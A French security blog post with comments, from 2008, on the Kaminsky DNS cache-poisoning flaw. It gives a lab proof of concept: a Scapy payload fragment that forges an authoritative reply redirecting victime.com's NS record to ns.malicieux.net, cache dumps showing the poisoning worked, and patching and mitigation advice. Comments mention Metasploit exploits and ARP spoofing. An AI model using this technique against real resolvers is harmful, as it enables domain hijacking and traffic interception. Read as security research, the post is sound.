DNS encore, peut-être une solution...

Par Sid, mercredi 23 juillet 2008 à 13:28 :: (In)Sécurité :: lu 5100 fois :: #287 :: rss :: atom
Read it in english with Google

Surprenant, non ?

e décrivais hier les propositions de Halvar Flake et Thomas Ptacek. Et vous faisais également part de mes interrogations sur leur fonctionnement. En effet, je me suis quand même dit que tout ça méritait quelques vérifications. J'ai donc monté rapidement un serveur DNS récursif pour l'occasion. Il s'agit d'un BIND 9.5.0, provenant du paquet fournit par la Sid de Debian. Il est configuré sans forwarder et tape donc directement les serveurs racines.

Et se faisant, je ne suis pas parvenu à faire fonctionner les attaques proposées, et en particulier celle de Ptacek. Loin de baisser les bras, je me suis mis à essayer des variantes, basées d'une part sur l'observation de requêtes spécifiques et la lecture d'un peu de documentation, en particulier la RFC 2181. Et finalement, c'est passé...

Update (24/07/2009 - 07:48) : HD.Moore et I)ruid me confirment que ma méthode fonctionne, et nettement mieux que leur premier plugin^[1] pour Metasploit. Du coup, ils en ont écrit un nouveau qui implémente cette attaque.

Pour résumer un peu. La réponse spoofée victorieuse doit passer un enregistrement de type NS en section Authority vers un nom arbitraire ainsi que son enregistrement A en section Additional. À partir de là, vous allez avoir plusieurs cas.

Si votre réponse n'est pas autoritaire, seul l'enregistrement A sera caché, à condition que le nom appartienne au domaine que vous voulez corrompre. C'est l'effet in-bailiwick. Ça, c'est typiquement le premier exploit Metasploit publié hier et pointé par Jipe en commentaire.
Si vous positionnez le flag AA, c'est à dire si la réponse est autoritaire, alors vous allez très probablement mettre à jour l'enregistrement NS du domaine dans le cache visé, avec deux légères variantes.
- Si le nom est complètement arbitraire, seul le NS change. C'est ce que je montre plus bas.
- Si par contre le nom appartient au domaine corrompu, vous bypassez aussi le in-bailiwick et l'enregistrement A se retrouve également caché.

Globalement, dans les deux derniers cas, vous obtenez la même chose, c'est à dire la main sur le domaine vis-à-vis du cache DNS visé. La différence dans le cache est cosmétique.

Pour ce qui est des protections. D'abord, patchez. C'est le minimum vital. Même si la randomisation du port source ne résoud pas le fond du problème, c'est une mesure qui aide énormément. Ensuite, appliquez les best practices quand à la mise en œuvre de vos serveurs DNS^[2] : séparation des fonctions récursives et autoritaires, limitation maximale de l'accès à la fonction récursive, architecture prenant en compte le spoofing, en particulier venant de vos clients, etc. Autant de choses qui vont compliquer la réalisation de l'attaque. De manière plus définitive, on pourrait aussi penser à désactiver l'utilisation du cache, mais je n'ai pas regardé si c'était faisable. C'est cependant un poil violent comme compromis, en particulier en terme de charge pour l'infrastructure...

Vous pouvez également, comme certains le conseillent, vous appuyer sur une infrastructure externe dûment patchée comme OpenDNS, voire des services payants. Pour cela, il vous suffit de configurer votre serveur en "forwarder" vers les serveurs du fournisseur retenu. C'est à mon avis la meilleure solution qui se présente aujourd'hui. Certes, quelqu'un pourra se rendre compte que vous utiliser une telle infrastructure et tenter de lancer son attaque entre vous et elle. C'est pourquoi cela ne dispense absolument pas de patcher ses serveurs !

À noter aussi, le travail de Jose Avila sur l'audit des caches DNS et l'outil qui va avec, lequel supporterait BIND et le DNS Microsoft. Et puis enfin, pour tester les serveurs dont on dépend, en plus de l'outil en ligne fourni par Kaminsky, vous en trouverez un nettement mieux au DNS-OARC.

Pour ce qui est de mon PoC, je vous fais grâce de la confiture. Voici le payload DNS^[3] qui permet de faire pointer le NS de victime.com vers ns.malicieux.net dans le cache de Bob^[4] :

########################################
#
# Copyright (C) 2008 Cedric Blancher <sid@rstack.org>
#
# This program is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public
# License version 2 as published by the Free Software
# Foundation; version 2.
#
########################################
[...]
payload = DNS(
    id = TXID,
    qr = 1,
    aa = 1,
    qd = QD,
    an = DNSRR(
         rrname = HOST + "." + DOMAIN
         type = "A",
         ttl = 86400,
         rdata = "9.8.7.6"),
    ns = DNSRR(
         rrname = DOMAIN,
         type = "NS",
         ttl = 86400,
         rdata = "ns.malicieux.net"),
    ar = DNSRR(
         rrname = "ns.malicieux.net",
         type = "A",
         ttl = 86400,
         rdata = "9.8.7.6"))

Voilà qui devrait répondre aux questions métaphysiques qui tiraillent Vanhu.

Pour commencer, voyons un peu les différentes étapes des attaques proposées, en particulier celle de Ptacek. Il s'agit d'envoyer une avalanche de requêtes sur le serveur cible, ns.bob.com, pour des noms qui n'existent pas dans le domaine domaine victime.com. Supposons que nous voulions faire résoudre aaaaaa.victime.com à ns.bob.com. Ce serveur va d'abord demander à un serveur racine qui va lui retourner les serveurs en charge du TLD .com. Il va alors reposer la question à l'un d'entre eux, lequel va lui retourner les informations nécessaires à la localisation du serveur DNS en charge du domaine victime.com. Regardons ce que nous retourne un de ces serveurs.

~$ dig @192.35.51.30 aaaaaa.victime.com
[...]
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19516
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 1,
;;   ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;aaaaaa.victime.com.           IN      A

;; AUTHORITY SECTION:
victime.com.           172800  IN      NS      ns.victime.com.

;; ADDITIONAL SECTION:
ns.victime.com.        172800  IN      A       1.2.3.4
[...]

À chaque requête, ns.bob.com cache les informations reçues, et en particulier, il va cacher que le serveur en charge de victim.com est ns.victim.com et que son IP est 1.2.3.4. Il va ensuite demander le nom aaaaaa.victim.coim à ce serveur qui va lui répondre qu'il n'existe pas. Cette réponse est également cachée. On peut observer tout ceci sur le serveur BIND, en utilisant l'outil "rndc" qui permet la gestion en live d'un serveur BIND. Nous allons l'utiliser également pour vioder le cache avant toute opération.

~$ sudo rndc -s 127.0.0.1 flush

Ensuite, nous pouvons commencer à interroger le serveur.

~$ dig @127.0.0.1 aaaaaa.victime.com
[...]

Maintenant que c'est fait, allons examiner le contenu du cache.

~$ sudo rndc -s 127.0.0.1 dumpdb -cache
~$ less /var/cache/bind/named_dump.db
;
; Start view _default
;
[...]
; glue
victime.com.            172798  NS      ns.victim.com.
; glue
ns.victime.com.         172798  A       1.2.3.4
; authauthority
aaaaaa.victime.com.     298     \-ANY   ;-$NXDOMAIN
[...]

On voit bien les informations obtenues. En particulier, on constate que les informations d'autorité du domaine victim.com sont précédées du mot "glue" qui signifie qu'elles ont été obtenues de sources non-autoritaires, en l'occurence un serveur racine de .com, en accompagement d'une réponse^[5]. C'est à peu de chose près l'état dans lequel va se trouver le cache lorsque nous arriverons à faire passer une réponse spoofée. Supposons qu'elle se produise pour bbbbbb.victime.com.

Que voulons-nous faire ? On pourrait ajouter une entrée pour www.victime.com là-dedans. Ce qui veut dire passer un enregistrement A dans la réponse, à côté de bbbbbb.victime.com. On pourrait le mettre en Additional RR. Notre réponse aura donc un Answer RR donnant une IP arbitraire à bbbbbb.victime.com et un Additional RR pointant www.victime.com sur 9.8.7.6. Malheureusement, je n'arrive pas à faire fonctionner cette technique, l'enregistrement est systématiquement ignoré. Soit en rusant un peu en Answer RR, en spécifiant que bbbbbb.victime.com demandé est un alias de www.victime.com et que ce dernier nom a pour IP 9.8.7.6. Ceci nous fait une réponse avec deux Answer RR, un CNAMe et un A, ce qui est tout à fait valide. Seulement voilà, ça ne marche pas non plus. Le serveur va bien accepter le CNAME, mais va envoyer une requête pour obtenir l'enregistrement A de www.victime.com. Et comme la corruption n'est pas encore faite, ça tombe à l'eau.

Maintenant, on pourrait vouloir faire quelque chose de plus puissant, à savoir rediriger le serveur DNS en charge du domaine, comme le suggère finalement Kaminsky. Pour avoir une idée des leviers dont nous disposons, regardons de plus près une requête valide sur www.victime.com.

~$ dig @ns.victime.com www.victime.com
[...]
;; QUESTION SECTION:
;www.victime.com.               IN      A

;; ANSWER SECTION:
www.victime.com.        10800   IN      A       1.2.3.4

;; AUTHORITY SECTION:
victime.com.            10800   IN      NS      ns.victime.com.

;; ADDITIONAL SECTION:
ns.victime.com.        172800   IN      A       1.2.3.4
[...]

On peut donc agir soit sur l'enregistrement A placé en Additional RR, soit sur le NS placé en Authority RR. La première solution ne marchera pas, comme précédemment. Par contre, pour la seconde, ça fonctionne. C'est à dire que si vous générez une réponse qui fera pointer le champ NS de la section autoritaire vers par exemple ns.malicieux.net, vous allez mettre à jour le cache. Si nous forgeons ainsi la réponse à bbbbbb.victime.com, nous allons recevoir la réponse suivante :

~$ dig @127.0.0.1 bbbbbb.victime.com
[...]
;; QUESTION SECTION:
;bbbbbb.victime.com.            IN      A

;; ANSWER SECTION:
bbbbbbbb.victime.com.   86400   IN      A	9.8.7.6

;; AUTHORITY SECTION:
victime.com.            86400   IN      NS      ns.malicieux.net.

Très encourageant. Et si nous regardons le résultat dans le cache, c'est confirmé.

~$ sudo rndc -s 127.0.0.1 dumpdb -cache
~$ less /var/cache/bind/named_dump.db
;
; Start view _default
;
[...]
; authauthority
victime.com.            86218   NS      ns.malicieux.net.
; glue
ns.victime.com.         171137  A       1.2.3.4
; authanswer
aaaaaa.victime.com.     298     \-ANY   ;-$NXDOMAIN
[...]
; authanswer
bbbbbb.victime.com.     86218   A       9.8.7.6

Nous voyons que même si l'enregistrement correspondant à ns.victime.com pointe toujours sur la bonne IP, ce n'est plus lui qui est référencé comme serveur DNS en charge du domaine victime.com. C'est ns.malicieux.net. En plus, cette information n'est plus en "glue", mais en "authauthority". Et c'est là que se situe le truc. Si on lit la RFC 2181, section 5.4.1, on peut voir qu'une hiérarchie de confiance existe quant aux données qu'un serveur peut récupérer à travers les requêtes DNS qu'il émet en fonction de leur provenance. Et surtout qu'il existe la possibilité d'écraser des données par d'autres, de confiance plus forte.

5.4.1. Ranking data

  When considering whether to accept an RRSet in a reply, or
  retain an RRSet already in its cache instead, a server
  should consider the relative likely trustworthiness of the
  various data. An authoritative answer from a reply should
  replace cached data that had been obtained from additional
  information in an earlier reply. However additional
  information from a reply will be ignored if the cache
  contains data from an authoritative answer or a zone file.

  The accuracy of data available is assumed from its source.
  Trustworthiness shall be, in order from most to least:

    + Data from a primary zone file, other than glue data,
    + Data from a zone transfer, other than glue,
    + The authoritative data included in the answer section
      of an authoritative reply.
    + Data from the authority section of an authoritative
      answer,
    + Glue from a primary zone, or glue from a zone transfer,
    + Data from the answer section of a non-authoritative
      answer, and non-authoritative data from the answer
      section of authoritative answers,
    + Additional information from an authoritative answer,
      Data from the authority section of a non-authoritative
      answer, Additional information from non-authoritative
      answers.

Dans notre cas, le premier enregistrement NS pour victime.com caché par ns.bob.com venait d'un serveur en charge de .com. Cette réponse n'était pas autoritaire. On se trouve donc face à des données décrites par le septième point^[6]. Avec notre réponse, nous fournissons nos données en spoofant le serveur autoritaire sur la zone, ns.victime.com. Nous sommes donc dans le quatrième cas^[7], et nos données sont considérées comme de confiance par rapport aux anciennes, entraînant la mise à jour du cache. Emballez, c'est pesé.

Vérifions un coup :

~$ dig @127.0.0.1 -t NS victime.com
[...]
;; QUESTION SECTION:
;victime.com.                  IN      NS

;; ANSWER SECTION:
victime.com.         85921     IN      NS     ns.malicieux.net.

Tadaaaaa ! \o/

Si je dis que c'est peut-être la solution, c'est parce que j'ai pu me tromper. Soit en implémentant les attaques de Flake et Ptacek, soit dans la configuration de mon banc de test, ou encore quelque obscur effet démo qui ruinerait tout. Ceci est donc à prendre avec des pincettes, même si je n'ai pas l'impression d'avoir fait une monumentale bourde quelque part là-dedans. Je vous laisse juger, et essayer surtout. Parce qu'il ne faut pas croire tout ce qu'on lit sur Internet ;)

Et un grand merci à Phil pour m'avoir aider à faire marcher mon spoofer, Scapy based, bien évidemment :) Et puis Halvar Flake et Thomas Ptacek pour la voie qu'ils ont tracée. Presque jusqu'au bout...

Notes

[1] Il ne leur manquait pas grand chose, comme vous pourrez le voir si vous diffez les deux plugins.

[2] Vous ne l'avez pas déjà fait depuis le temps ?!...

[3] Maintenant que c'est dans Metasploit, qui a encore besoin de lire du code ? <cc>

[4] So long pour le Pago et le mars :)

[5] Ici la réponse à la requête sur aaaaaa.victime.com.

[6] Data from the authority section of a non-authoritative answer.

[7] Data from the authority section of an authoritative answer.

Note : 5.0/5 pour 9 votes

Trackbacks

1. Le jeudi 24 juillet 2008 à 17:42, de SecFault.Org

Exploit DNS in the wild !

Vous avez sans doute entendu parler de la fameuse DNS, qui fait trembler tout l?Internet depuis quelques jours...

2. Le samedi 26 juillet 2008 à 15:49, de Bebertron

L'attaque DNS: proposition d'un schéma de détection d'empoisonnement de cache

Comment peut on détecter l'empoisonnement du cache de son serveur DNS, sans interroger systématiquement les serveurs DNS autoritaires ? Je propose ici une tentative de solution...

3. Le mercredi 30 juillet 2008 à 10:52, de Da gadgeto-libro-geeko-Ulysso weblog, Na!

Bréves #5

C'est pas vraiment que j'ai pas le temps, c'est plus une histoire de flemme en fait... Un tit billet fourre-tout avec une collection de liens intéressants ou pas...

4. Le mardi 5 août 2008 à 17:34, de CommunauTech

DNS : Dénis de Non Secret

Dans la nuit du 23 au 24 juillet dernier, entre 2H et 6H du matin, nombre de requêtes DNS en France n'ont pu être résolues. Nulle "guerre Internet Mondiale Définitive", mais de sérieux désagréments pour certains serveurs...

5. Le mercredi 6 août 2008 à 06:48, de SecuObs, l'observatoire de la sécurité informatique

Exploitation en cours de la faille DNS

La faille DNS dont les détails seront prochainement officiellement révélés par Dan Kaminsky, a fait l'objet de nombreuses recherches, aboutissant à la sortie de plusieurs exploits publics et privés...

6. Le vendredi 12 septembre 2008 à 17:26, de Le blog d' ISoft

La faille DNS officiellement révélés par Dan Kaminsky fait l'objet de nombreuses recherches

La faille DNS dont les détails seront prochainement officiellement révélés par Dan Kaminsky, a fait l'objet de nombreuses recherches, aboutissant à la sortie de plusieurs exploits publics et privés....

Pour faire un trackback sur ce billet (URL valide pendant 5 minutes) : http://sid.rstack.org/blog/tb.php?id=287&chk=k0734h

Commentaires

1. Le mercredi 23 juillet 2008 à 15:52, par Yom

Tiens, pas de section "Greetings" ? :-)

Réponse de Sid

C'est vrai, j'ai oublié de remercier Phil pour m'avoir aider à finaliser mon code.

2. Le mercredi 23 juillet 2008 à 15:57, par jme

Je leak le poc contre un Pago et un mars.

3. Le mercredi 23 juillet 2008 à 16:22, par Kevin

Je décrivez hier

Dans l'emballement de poster?

Réponse de Sid

C'est petit :)

4. Le mercredi 23 juillet 2008 à 16:23, par Yom

@jme: et contre un Coca Light, on a quoi ?

5. Le mercredi 23 juillet 2008 à 16:27, par Yom

C'est pas un peu facile de taper sur un protocole dont une des RFCs comporte les lignes suivantes ?
  12. Security Considerations
  This document does not consider security.

6. Le mercredi 23 juillet 2008 à 16:51, par Kirikou

C'est sur faut essayer. J'essaierai d monter une maquette rapidement et de faire part des retours :-) Bon c'est pas dis que j'y parvienne (loin de la !) mais sait-on jamais, c'est comme ca qu'on apprend. :-) (ou pas...)

Sinon prochain post : DNS Toujours...DNS 43v3R

J'aurai pas pensé que Debian serait battu au niveau du buzzz.

7. Le mercredi 23 juillet 2008 à 17:26, par Vanhu

Et il est sous quelle licence, ton spoofer ?

Ah, au temps pour moi, on me signale que les SSTIC, c'est fini, et qu'il faut donc arréter de poser cette question tout le temps....

Réponse de Sid

La license n'a de sens que s'il y a publication, très cher :)

Je me poserai la question à ce moment là, <joke>probablement à Black Hat</joke>, mais il y a de grandes chances que vous soyiez déçus.

8. Le mercredi 23 juillet 2008 à 22:39, par Vinares

Une question sur les conditions du tests : s'agit-il d'une version patchée ou pas ? Je pense que les serveurs dns des opérateurs internet vont subir de nombreuses attaques vu la "simplicité" de l'attaque.

Réponse de Sid

Oui, la version de BIND utilisée est patchée. Mais comme indiqué dans les billets précédents sur la question, le patch ne corrige pas la vulnérabilité proprement dite, mais la rend juste plus difficile à exploiter. Ce qui est également important de comprendre, c'est qu'il s'agit de la toute dernière étape de l'attaque, la charge utile si on veut imager. Il reste encore à la distiller et pour se faire il faut arriver à spoofer une réponse à un requête émise par le serveur cible. C'est là que le patch vous complique la tâche par l'introduction du port source aléatoire.

9. Le mercredi 23 juillet 2008 à 23:32, par Jipe

Hi,

HDM & I)ruid viennent de releaser un exploit msf pour bind 9.4.1-9.4.2: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt

Réponse de Sid

Leur exploit fait exactement la même chose que moi. Au détail près qu'il est vendu pour créer un nom (pwned.doxpara.com) dans le cache du serveur A.B.C.D avec une IP arbitraire (1.3.3.7). Sauf que ceci ne marche que si ne nom appartient au domaine attaqué (doxpara.com). En gros, ils rajoutent un nom arbitraire dans le domaine avec un IP quelconque. À condition qu'il ne soit pas déjà dans le cache, parce que un champ Answer est prioritaire sur un champ Authority... Et en plus, ils ne génèrent pas un réponse autoritaire, ce qui la rend encore moins efficace...

Mais par contre, si on peut effectivement passer ce qu'on veut dans le champ NS, on prend carrément le contrôle du domaine, pas juste d'un nom.

Et quelques échanges de mails plus tard, HD.Moore confirme et pond un nouvel exploit, qui écrase l'enregistrement NS cette fois. Ils avaient juste oublié de rendre leur réponse autoritaire ;)
http://www.caughq.org/exploits/CAU-EX-2008-0003.txt

10. Le jeudi 24 juillet 2008 à 09:51, par Jipe

Etrange mais depuis ce matin les serveurs DNS primaires et secondaires de Free sont bien à la ramasse (seul le tertiaire semble fonctionner correctement). Coïncidence ?

jipe@gadabou ~ $ dig @212.27.53.252 sid.rstack.org A
; <<>> DiG 9.4.1-P1 <<>> @212.27.53.252 sid.rstack.org A
; (1 server found)
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 8952
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;sid.rstack.org.                        IN      A

;; Query time: 1 msec
;; SERVER: 212.27.53.252#53(212.27.53.252)
;; WHEN: Thu Jul 24 10:29:36 2008
;; MSG SIZE  rcvd: 32

Réponse de Sid

Il serait intéressant de voir ce que ça donne en NS. Par exemple :
~$ dig @212.27.53.252 rstack.org NS
Est-ce que c'est lié ? Bonne question. En tout cas, les DNS récursifs de FAI sont clairement des cibles de choix.

11. Le jeudi 24 juillet 2008 à 10:50, par Nico

C'est bien Padawan-Sid!

Sinon, le cache poisoning, c'est parti... hmmm packet love.

Nico.

Réponse de Sid

Thx Master :)

12. Le jeudi 24 juillet 2008 à 10:54, par Kevin

Notre réponse aura donc un Answer RR donnant une IP arbitraire à bbbbbb.victime.com et un Additional RR pointant www.victime.com sur 9.8.7.6. Malheureusement, je n'arrive pas à faire fonctionner cette technique, l'enregistrement est systématiquement ignoré.

Ce qui parait logique, in fine. On demande bbbbbb.victime.com, on nous répond en bonus www.victime.com. Pour quelle raison accepter une réponse à une question qui n'est pas posée?

Réponse de Sid

Oui, mais c'est exactement ce que décrit Ptacek...
Poisoning CXOPQ.VICTIM.COM is not super valuable to Mallory.
But Mallory has another trick up her sleeve. Because her
response didn't just say CXOPQ.VICTIM.COM was 6.6.6.0. It
also contained Additional RRs pointing WWW.VICTIM.COM to
6.6.6.0. Those records are in-bailiwick: Bob is in fact
interested in VICTIM.COM for this query. Mallory has
combined attack #1 with attack #2, defeating fix #1 and fix
#2. Mallory can conduct this attack in less than 10 seconds
on a fast Internet link.
Comme quoi, ça vaut toujours le coup de vérifier, surtout quand ça paraît bizarre :) Il a juste oublié de coller le NS vers WWW.VICTIM.COM en Authority RR...

13. Le jeudi 24 juillet 2008 à 11:13, par Jipe

Même sentence pour le NS ce matin sur la zone sid.rstack.org (comme sur bien d'autres) : pas de réponse.

A l'heure actuelle la situation semble être revenue à la normale (bien que certains de leurs DNS soient toujours vulnérables).

En revanche, si tout le monde commence à jouer avec les exploits publics qui envoient des centaines de milliers de paquets ça risque vite de finir en ddos tout ça :-)

14. Le jeudi 24 juillet 2008 à 11:29, par trez

Petite question bête, si mon serveur DNS est configuré en Forwarder vers des serveurs DNS patchés, est ce que je cours un risque tout de même ?

Réponse de Sid

Relativement peu de risque.

15. Le jeudi 24 juillet 2008 à 15:47, par Kostya

OMG (comme ils disent ici) http://blogs.zdnet.com/security/?p=1546

16. Le jeudi 24 juillet 2008 à 15:56, par Robert

Etait-il nécessaire que tu leur envoies un mail pour les aider à publier un PoC performant ??

Ne crois-tu pas que tu vas te faire tirer les oreilles, probablement avec raison ? Je ne suis pas certain que dans le cadre de ton job on attende de toi que tu aides à accélérer la publication de code d'exploitation.

Réponse de Sid

C'est quelque chose qui relève du sujet très controversé du full disclosure. Je suis intimement persuadé que ce n'est pas en cachant de l'information qu'on rendra le net plus sûr. Je pourrais développer plus, mais globalement, l'idée, c'est que le chemin pour aller d'une description de l'exploitation d'une faille au PoC qui va avec est tellement court qu'accorder la moindre importance à la disponibilité publique d'un exploit revient à se fourrer le doigt dans l'œil jusqu'au coude. En particulier dans le cas présent, où la différence entre les deux codes ne tient réellement qu'à la valeur d'un flag. Es-tu naïf au point de penser que ça aurait tenu ne serait-ce que quelques heures de plus ?

Bref, si je comprends ton point de vue et ne le trouve pas ridicule, je n'y adhère pas. Du tout.

As-tu lu ce papier intitulé "The Market for Lemons" sur les conséquence de l'asymétrie informationnelle ? Si ce n'est pas le cas, lis-le, c'est très instructif. En particulier, l'auteur applique sa théorie au marché des voitures d'occasion et démontre que la différence de niveau d'information sur la qualité des produits entre le vendeur, professionnel donc bien informé, et les acheteurs, globalement moins bien informés, tire le marché à la baisse en terme de qualité. Parce que le client tend à sous évaluer les biens, encourageant le vendeur à lui proposer des biens de mauvaise qualité. Et ainsi de suite. Et bien pour la sécurité, c'est pareil. Le manque d'information et la volonté de cloisonner certaines informations jugées sensibles (par qui, comment, pourquoi ?) tirent tout le monde vers le bas, ne serait-ce que parce que ça incite les gens dont l'action contribue au maintien du niveau de sécurité à être moins réactifs.

C'est peut-être ce qui explique que, par exemple, alors que d'aucuns clament que cette faille était connue de certains depuis 10 ans, elle soit toujours là aujourd'hui. Bref, que personne n'ait rien fait pour la corriger avant que le net ne prenne les proportions qu'on lui connaît. Rien que la lecture des premiers débats sur l'introduction de la randomisation du port source est édifiante de ce point de vue. Et des exemples de problèmes réputés connus depuis longtemps qui ont survécu des années sans que personne ne s'en soucie, il y en a à la pelle. Ce qui amène un argument empirique que personnellement je n'aime pas, mais qui est malheureusement très vrai, à savoir que tant qu'il n'y a pas d'exploit public ou de battage médiatique, les gens ne patchent pas, et les problèmes restent.

Et puis bon, il faut aussi prendre du recul par rapport au battage médiatique actuel, justement. Ce n'est pas parce que toute la presse et la blogosphère en parlent depuis deux semaines que ce problème est plus important que le bug OpenSSL chez Debian, pour lequel des exploits ont été publiés plus rapidement, ou d'autres joyeusetés comme il en traîne en ce moment, mais dont personne ne trouve plus le temps de parler...

17. Le jeudi 24 juillet 2008 à 17:45, par Romain

Sid: dans ce cas là, qu'est-ce qui t'a empêché de publier ton exploit au moment où tu as fait un billet expliquant son efficacité ?

Réponse de Sid

Parce que ce n'en est pas un. C'est un PoC spécifiquement écrit pour ma maquette, dont le code est pourri, terriblement non fonctionnel et que j'ai la flemme (et pas top le temps non plus) de faire ce qui faut pour le rendre utilisable par quelqu'un d'autre. Et aussi parce que ce qui m'a motivé pour comprendre cette faille n'était pas la volonté d'être le premier à publier un truc...

18. Le jeudi 24 juillet 2008 à 18:04, par lux

Dans la RFC il est bien marqué qu'il n'est pas possible d'écraser un enregistrement autoritaire : "additional information from a reply will be ignored if the cache contains data from an authoritative answer..."

Donc je vois mal comment dans la vraie vie il serait possible d'écraser le NS dans le cache du serveur vulnérable.

Si on cherche à rediriger le NS de victim.com, il y a quand même une forte probabilité que le NS autoritaire soit dans le cache suite à tous les paquets envoyés.

Est-ce qu'il y a un détail qui m'échappe ?

Merci pour cet article.

Réponse de Sid

Parce que justement, si le cache ne reçoit les informations de NS que des TLD, alors ces entrées ne sont pas autoritaires. Et c'est pour ça qu'on arrive à les écraser avec notre réponse qui, elle, est autoritaire.

Ce qui m'amène à un truc que je dois tester. Si vous regardez une résolution chez Google, vous allez voir ceci :
~$ dig ns1.google.com
[...]
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 54788
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 3

;; QUESTION SECTION:
;ns1.google.com.			IN	A

;; ANSWER SECTION:
ns1.google.com.		70870	IN	A	216.239.32.10

;; AUTHORITY SECTION:
google.com.		245640	IN	NS	ns1.google.com.
google.com.		245640	IN	NS	ns2.google.com.
google.com.		245640	IN	NS	ns3.google.com.
google.com.		245640	IN	NS	ns4.google.com.

;; ADDITIONAL SECTION:
ns2.google.com.		70870	IN	A	216.239.34.10
ns3.google.com.		70870	IN	A	216.239.36.10
ns4.google.com.		70870	IN	A	216.239.38.10
Comme vous pouvez le constater, une précédente requête sur une enregistrement existant du domaine google.com, votre cache récupère exactement les mêmes types d'informations que ceux que vous essayez de pousser avec l'attaque. Du coup, avec un cache dans cet état, vous allez tenter d'écraser des données de même priorité. Maintenant, la question est de savoir si ça va passer...

Et si je ne me trompe pas dans mon test, ça passe, ce qui est apparemment contraire à ce que dit la RFC... Bref, il y a pleins de race conditions de ce genre à tester, il doit rester quelques problèmes de ce genre.

19. Le vendredi 25 juillet 2008 à 06:29, par fb

Robert a dit 'Je ne suis pas certain que dans le cadre de ton job on attende de toi que tu aides à accélérer la publication de code d'exploitation.'

Hervé : sors de ce corps !

Réponse de Sid

C'est bon, ce troll là est loin derrière, ce n'est pas la peine de le ressortir du placard.

20. Le vendredi 25 juillet 2008 à 08:59, par Yann

Merci pour ce fort intéressant article, et pour ton travail. Je comprends pas comment certaines personnes se permettent de te critiquer ! Enfin bon, y aura toujours des jaloux...

Réponse de Sid

Je pense que le débat du full disclosure est intéressant, tant qu'il ne tombe pas dans le troll de bas étage, ce qui malheureusement arrive relativement vite, et qu'à ce titre, la question de Robert n'est pas inintéressante. Enfin, comme le rappelait News0ft en citant Beaumarchais, "sans la liberté de blâmer, il n'est point d'éloge flatteur". Et tant qu'elle reste constructive, la critique est toujours la bienvenue ici.

21. Le vendredi 25 juillet 2008 à 10:37, par denis

est ce que les directives additional-from-auth, additional-from-cache or minimal-responses de BIND peuvent aider à mitiger l'attaque ?

Réponse de Sid

Non, ça ne vous permettra pas de protéger votre cache parce que ce sont des options qui définissent le comportement d'un serveur quand il répond.

minimal-responses va évacuer de la réponse qu'il vous renvoie les champs inutiles, typiquement les sections Authority et Additional quand elles ne servent pas, mais il va quand même cacher ces informations si le serveur au-dessus les a transmises ;

additional-from-auth et additional-from-cache sont spécifiques aux serveurs autoritaires.

22. Le vendredi 25 juillet 2008 à 11:12, par dany5

moi perso je remercie Dan Karminsky et ceux qui on bossé avec lui d'avoir prévenu les éditeurs et les principaux acteurs à l'avance...

j'imagine le boxon si on avait eu : "faille DNS facile et pas cher, pas encore de patch"...

bon le coup de se réserver les détails pour la blackhat...

Réponse de Sid

Qu'on soit clair, le travail de Dan Kaminsky est énorme sur ce coup là. Comme le dit Halvar, découvrir ce qu'est un problème quand on sait qu'il est là est infiniment plus facile que trouver le problème et tout le reste derrière. De ce point de vue là, respect.

Par contre, j'ai du mal à comprendre pourquoi ils n'ont pas garder le problème secret plus longtemp s'ils jugeaient que les détails posaient problème, et élargi la boucle progressivement avant de publier l'existence de la faille : éditeurs/constructeurs, carriers, gros ISP, ISP plus petits, sociétés, etc. Ce n'est clairement pas simple à faire, pas du tout, mais avec l'appui des CERT, ça aurait pu augmenter encore la proportion de serveurs patchés à l'annonce, et a fortiori à la sortie de l'exploit.

Comme je le disais plus tôt, soit on garde le problème entre gentlemen, soit on publie tout. Mais si on suit la logique exprimée par le club des initiés, le problème aurait dû rester sous le manteau aussi longtemps que la situation n'était pas propre à une publication. Parce qu'à partir du moment où la faille était annoncée, il était évident que les choses allaient s'emballer, que des gens comprendraient ce qui n'allait pas exactement et que des exploits seraient distribués (publiquement ou pas). Donc de deux choses l'une, ou ils ont vraiment suivi ce process consciencieusement et toutes les publications de ces derniers jours ont un impact très faible, ou alors ce n'est pas le cas, et la publication avec rétention d'information n'était qu'un coup de pub.

23. Le vendredi 25 juillet 2008 à 14:17, par funkinessflavor

Très instructif comme toujours. Merci.

[mode lazy_scapy_user=on]

'PoC.command()' possible ?
voire un 'cat .scapy_history' :D

[mode lazy_scapy_user=off]

Réponse de Sid

Je suis feignant aussi.

24. Le vendredi 25 juillet 2008 à 14:43, par funkinessflavor

Ok ok je vais me sortir les doigts.

Sinon, en bon noob que je suis, j'ai tenté la semaine dernière de forger une réponse à une requête émise par un simple nslookup. Sans succès. Nslookup ne veut rien savoir alors que wireshark semble bien content de la réponse (tout colle: txid, port source et il indique bien "request in: xxx" dans son analyse du paquet de la réponse).

Auriez-vous une idée ?

Réponse de Sid

Il est envoyé sur la bonne interface ?

25. Le vendredi 25 juillet 2008 à 14:55, par funkinessflavor

Oui.

Est-il possible qu'il y ait un mécanisme de sécurité sur nslookup qui refuse les réponses DNS lorsqu'elles arrivent en trop grand nombre ? Peu probable amha mais bon.

Réponse de Sid

Non, mais il faut arriver en premier. Et avec Scapy, c'est pas facile de gagner la course...

26. Le vendredi 25 juillet 2008 à 15:13, par funkinessflavor

C'est sûr, il prend bien son temps le bougre ! Mais je lui pardonne. Il est tellement attachant... En tout cas j'arrive bien en premier (le txid ne change pas avec nslookup donc quelques paquets suffisent pour couvrir les ports). De toute manière j'ai triché avec un peu d'arpspoofing (eh je suis sur un lan alors j'en profite) de manière à inhiber le dns légitime.

Je vais continuer à chercher.

27. Le vendredi 25 juillet 2008 à 17:22, par jj

funkinessflavor: l'attaque vise les serveurs dns recursifs, pas les clients directement

28. Le samedi 26 juillet 2008 à 11:51, par Yom

"il faut arriver en premier. Et avec Scapy, c'est pas facile de gagner la course..."

Surtout si la plate-forme de test est sur un même segment de réseau.
